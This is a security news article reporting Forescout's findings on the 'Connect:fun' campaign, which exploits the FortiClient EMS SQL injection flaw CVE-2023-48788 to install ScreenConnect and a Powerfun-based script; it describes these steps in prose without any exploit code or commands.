Security researchers spotted an exploitation campaign that targets organizations using an SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server (EMS) software.

Tracked as CVE-2023-48788, the issue was brought to public attention on March 12, 2024. Subsequently, on March 21, researchers released a proof of concept (PoC) exploit for this vulnerability. Since then, reports have surfaced of active exploits in the wild, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to include CVE-2023-48788 in its list of Known Exploited Vulnerabilities (KEV) on March 25.

Dubbed "Connect:fun" by Forescout Research’s Vedere Labs, the campaign has been attributed to a threat actor believed to be in operation since at least 2022. Evidence suggests that the threat actor targets Fortinet appliances and employs a combination of Vietnamese and German languages within their infrastructure.

“Initially perceived as a security team or research team in Vietnam based on the Github repository, they are actively exploiting and installing tools post-exploitation on real targets instead of only researching,” the threat analysis team said.

The observed attack targeted an unnamed media company in March 2024, the researchers said.

On March 21, server logs revealed the threat actor's attempts to exploit CVE-2023-48788, aiming for command execution by manipulating SQL Server configurations.

Exploiting the SQL injection flaw, the actor successfully deployed the ScreenConnect remote management tool and a customized script based on Powerfun, an open-source utility with versatile capabilities, including bind and reverse shells, as well as arbitrary command execution.

The attackers then used certutil.exe to download ScreenConnect from the domain ursketz[.]com, followed by installation via msiexec.exe. The researchers said they weren’t able to retrieve the ScreenConnect logs to identify the actor’s further actions.

“This is evidence the activity is part of a specific campaign rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances,” Forescout noted.